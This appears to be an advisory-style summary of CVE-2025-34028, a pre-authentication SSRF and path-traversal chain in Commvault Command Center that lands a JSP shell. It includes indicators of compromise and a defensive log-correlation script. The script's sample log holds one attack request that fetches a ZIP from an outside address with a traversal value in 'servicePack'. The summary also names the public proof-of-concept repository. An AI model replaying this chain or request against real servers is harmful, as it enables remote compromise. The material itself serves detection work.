Full Report
Following the disclosure of CVE-2025-30406, an RCE flaw in the widely used Gladinet CentreStack and Triofox platforms, another highly critical vulnerability that could likewise allow unauthenticated remote execution of arbitrary code has come to light. The flaw, tracked as CVE-2025-34028, was recently uncovered in the Command Center installation, which could lead to a […] The post CVE-2025-34028 Detection: A Maximum-Severity Vulnerability in the Commvault Command Center Enables RCE appeared first on SOC Prime.
Analysis Summary
# Vulnerability: Pre-Authenticated Remote Code Execution in Commvault Command Center
## CVE Details
- CVE ID: CVE-2025-34028
- CVSS Score: Maximum severity (the numeric score is not given in the source)
- CWE: Not explicitly stated (likely SSRF and path traversal chained into RCE)
## Affected Systems
- Products: Commvault Command Center
- Versions: Specific vulnerable versions are not listed in the provided context.
- Configurations: Vulnerability relies on interaction with a specific endpoint.
## Vulnerability Description
The vulnerability is a chain attack leading to Remote Code Execution (RCE) originating from a pre-authenticated Server-Side Request Forgery (SSRF) weakness in a specific endpoint. The attack involves:
1. Sending a request to fetch a malicious ZIP file from an external server via the vulnerable endpoint, leveraging a lack of host validation (SSRF).
2. The ZIP file is unpacked into a temporary directory.
3. Path traversal in the `servicePack` parameter is used to move the contents (a malicious `.jsp` shell file) to a web-accessible directory.
4. Execution of the extracted `.jsp` file achieves Remote Code Execution, potentially leading to a full system compromise.
## Exploitation
- Status: PoC available. WatchTowr Labs researchers have published a Detection Artefact Generator with a PoC.
- Complexity: Implied Low/Medium, since no authentication is required and a clear exploitation chain exists.
- Attack Vector: Network (Pre-authenticated).
## Impact
- Confidentiality: High (Potential for full system compromise)
- Integrity: High (Potential for full system compromise)
- Availability: High (Potential for full system compromise)
## Remediation
### Patches
- Vendor urges **immediate upgrades**. Specific patch versions are not detailed in this summary context.
### Workarounds
- No specific workarounds were detailed in the provided text, other than the urgent need for patching/upgrading.
## Detection
- **Indicators of compromise (IOCs):** Look for unexpected archive (ZIP) fetches through the vulnerable endpoint, `servicePack` values containing path traversal sequences, JSP files appearing in web-accessible directories, and subsequent requests to those files. Disclosure of historical system user information in response logs can also indicate that the PoC was executed.
- **Detection methods and tools:** Use a detection platform (the post mentions SOC Prime Platform) to deploy rules that cover each stage of the exploitation chain: SSRF traffic to the endpoint, file manipulation, and JSP execution.
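The three-stage chain above can be checked against web server access logs. The following is an added example (not from the SOC Prime post or watchTowr's tooling) that flags, per source address, an external ZIP fetch, traversal in `servicePack`, and a request for a JSP outside a known baseline; the endpoint path, the URL parameter name, the allowlist and the JSP baseline are placeholders, since the page does not name them.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines for demonstration only (not real traffic).
# "/commandcenter/EXAMPLE_ENDPOINT" and "EXAMPLE_URL_PARAM" are placeholders: the
# page names the servicePack parameter but not the endpoint or the URL parameter.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Apr/2025:10:01:02 +0000] "GET /commandcenter/ HTTP/1.1" 200 1024
203.0.113.5 - - [24/Apr/2025:10:01:07 +0000] "POST /commandcenter/EXAMPLE_ENDPOINT?EXAMPLE_URL_PARAM=http%3A%2F%2F198.51.100.9%2Fpkg.zip&servicePack=..%2F..%2Fwebapps%2FROOT HTTP/1.1" 200 210
203.0.113.5 - - [24/Apr/2025:10:01:09 +0000] "GET /commandcenter/unexpected.jsp HTTP/1.1" 200 330
192.0.2.20 - - [24/Apr/2025:10:02:00 +0000] "POST /commandcenter/EXAMPLE_ENDPOINT?servicePack=11.36 HTTP/1.1" 200 210
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \d+$')
ALLOWED_FETCH_HOSTS = {"updates.example.internal"}  # assumed allowlist of legitimate package sources
BASELINE_JSP = {"/commandcenter/index.jsp"}        # assumed inventory of legitimate JSP paths

def findings_for(line):
    """Return the suspicious traits found in one access-log line (empty list if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    params = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded once here
    hits = []
    # Stage 3 precondition: traversal in servicePack (decode twice to catch double-encoding).
    for v in params.get("servicePack", []):
        if ".." in unquote(unquote(v)).replace("\\", "/"):
            hits.append("traversal:servicePack")
    # Stage 1: any parameter carrying an absolute URL to a non-allowlisted host, ending in .zip.
    for key, values in params.items():
        for v in values:
            dv = unquote(v)
            if dv.lower().startswith(("http://", "https://")):
                u = urlsplit(dv)
                if (u.hostname or "") not in ALLOWED_FETCH_HOSTS and u.path.lower().endswith(".zip"):
                    hits.append(f"ssrf_zip:{key}")
    # Stage 4: request for a JSP that is not in the inventoried baseline.
    if parts.path.lower().endswith(".jsp") and parts.path not in BASELINE_JSP:
        hits.append("unexpected_jsp")
    return hits

def correlate(log_text):
    """Group findings by source address; a source showing all three traits matches the full chain."""
    by_src = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            by_src.setdefault(m.group("src"), set()).update(findings_for(line))
    return {src: sorted(h) for src, h in by_src.items() if h}
```

Running `correlate(SAMPLE_LOG)` reports only `203.0.113.5`, with all three traits; the legitimate-looking `servicePack=11.36` request from `192.0.2.20` produces no finding.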
## References
- Vendor advisory (urges immediate upgrade; no link is given in the source).
- WatchTowr Labs GitHub repository containing the PoC: `github.com/watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028`